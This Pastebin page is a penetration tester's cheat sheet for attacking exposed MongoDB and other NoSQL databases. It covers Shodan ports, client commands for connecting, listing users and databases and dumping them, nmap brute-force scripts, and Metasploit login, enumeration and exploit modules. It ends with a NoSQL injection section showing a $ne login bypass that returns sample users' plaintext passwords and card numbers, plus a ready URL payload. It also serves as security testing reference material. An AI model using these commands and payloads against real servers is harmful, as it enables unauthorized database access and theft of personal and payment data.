Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Shodan :
- Mongodb
- port : 27017 , 28017
- 6379
- couchdb , 5984
- Tools Automated Assessments (Nosqlmap):
- http://github.com/tcstool/nosqlmap
- How to attack :
- https://github.com/all3g/exploit-exercises/blob/master/mongodb/mongodb_hacking.md
- install :
- apt-get install mongodb-clients
- $ echo 'deb http://downloads-distro.mongodb.org/repo/debian-sysvinit dist 10gen' | sudo tee /etc/apt/sources.list.d/mongodb.list
- $ sudo apt-get update
- $ sudo apt-get install mongodb-org
- $ apt-get install mongodb-org=2.6.0 mongodb-org-server=2.6.0 mongodb-org-shell=2.6.0 mongodb-org-mongos=2.6.0 mongodb-org-tools=2.6.0
- # sudo service mongod start
- # sudo service mongod stop
- How to :
- Connect to DB:
- mongo --port <port> -u <username> -p <password> <IP>
- Note: Port 27017 is default value
- ex: mongo -u foo -p bar 10.10.10.10
- Show server info:
- db.adminCommand( { "hostInfo" : 1 } )
- ex: db.adminCommand( { "hostInfo" : 1 } )
- {
- "system" : {
- "currentTime" : ISODate("2014-03-01T14:47:54.379Z"),
- "hostname" : "AwesomePC",
- "cpuAddrSize" : 64,
- "memSizeMB" : 1002,
- "numCores" : 2,
- "cpuArch" : "x86_64",
- "numaEnabled" : false
- },
- "os" : {
- "type" : "Linux",
- "name" : "PRETTY_NAME=\"Debian GNU/Linux 7 (wheezy)\"",
- "version" : "Kernel 3.2.0-4-amd64"
- },
- "extra" : {
- "versionString" : "Linux version 3.2.0-4-amd64 (debian-kernel@lists.debian.org) (gcc version 4.6.3 (Debian 4.6.3-14) ) #1 SMP Debian 3.2.63-2+deb7u1",
- "libcVersion" : "2.13",
- "kernelVersion" : "3.2.0-4-amd64",
- "cpuFrequencyMHz" : "2266.747",
- },
- "ok" : 1
- }
- >
- Show users:
- show users
- -or-
- db.runCommand( { usersInfo: 1 } )
- ex: show users
- Show roles:
- show roles
- ex: show roles
- Show databases:
- show dbs
- ex: show dbs
- SecretDB (size of DB)
- AwesomeDB (size of DB)
- EmptyDB (empty)
- Use database:
- use <db_name>
- ex: use SecretDB
- Show tables (called collections):
- show tables
- -or-
- show collections
- -or-
- db.getCollctionNames()
- ex: show tables
- fluffy
- users
- List data in the table/collection:
- db.<table_name>.find()
- ex: db.users.find()
- Note: by default, it will only display one page
- Can also set limit with:
- db.<table_name>.find().limit(#)
- ex: db.users.find().limit(5)
- Search for exact match in the table/collection:
- db.<collection_name>.find( { <column_name> : "<value>" } )
- ex: db.users.find( { name : "Tony" } )
- Wildcard search data in the table/collection:
- db.<collection_name>.find( { <column_name> : /<value>/i } )
- Note: the i at the end of the /, makes the search case insensitive
- ex: db.users.find( { name : /tony/i } )
- Dump the DB for off-line grepping:
- mongodump -u <user> -p <pass> -h <IP> --db <db_name>
- ex: mongodump -u foo -p bar -h 10.10.10.10 --db SecretDB
- Note: Results are dumped to: dump/<db_name>/<collection_name>.bson
- Logout:
- logout
- CAVEATS:
- The cat command reads your own files, not the remote system's files
- ex: cat ("/etc/shadow") is your own shadow file :( Bummer, I know!
- find : db.users.find( { "email" : "xxx@xxx.com" } )
- insert Data :
- db.table.insert({name: "xxx" , lnam:"alalala" )
- Wiki :
- http://www.mongodbspain.com/wp-content/uploads/2014/03/MongoDBSpain-CheetSheet.pdf
- ========================================================================
- # Vulnerability Assessment
- nmap -p 27017 <ipaddress>
- nmap -p 27017 -sV <ipaddress>
- nmap -p 27017 --script mongodb-brute <ipadress>
- nmap -p 27017 --script mongodb-databases <ipaddress>
- msf > use auxiliary/scanner/mongodb/mongodb_login
- msf > use auxiliary/gather/mongodb_js_inject_collection_enum
- msf > use exploit/linux/misc/mongod_native_helper
- nmap -p 28017 <ipaddress>
- nmap -p 28017 -sV <ipaddress>
- http://<ipaddress>:28017/
- ========================================================================
- # Attacking Applications
- > db.users.find({"username":"jim", "password": {$ne: "0x00"}})
- { "_id" : ObjectId("55d5d719d60515e316247247"), "username" : "jim", "password" : "jim", "email" : "jim@gmail.com", "cardnumber" : 54321 }
- If you notice, the above MongoDB command is fetching all the documents where the username is "jim" and password not equals to "0x00".
- > db.users.find({"username": {$ne: "0x00"}, "password": {$ne: "0x00"}})
- { "_id" : ObjectId("55d5d6f2d60515e316247246"), "username" : "tom", "password" : "tom", "email" : "tom@gmail.com", "cardnumber" : 12345 }
- { "_id" : ObjectId("55d5d719d60515e316247247"), "username" : "jim", "password" : "jim", "email" : "jim@gmail.com", "cardnumber" : 54321 }
- { "_id" : ObjectId("55d5d739d60515e316247248"), "username" : "bob", "password" : "bob", "email" : "bob@gmail.com", "cardnumber" : 22222 }
- This time, we are able to see all the documents that do not meet the condition username and password as "jim".
- http://localhost/index.php?username[$ne]=test&password[$ne]=test
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement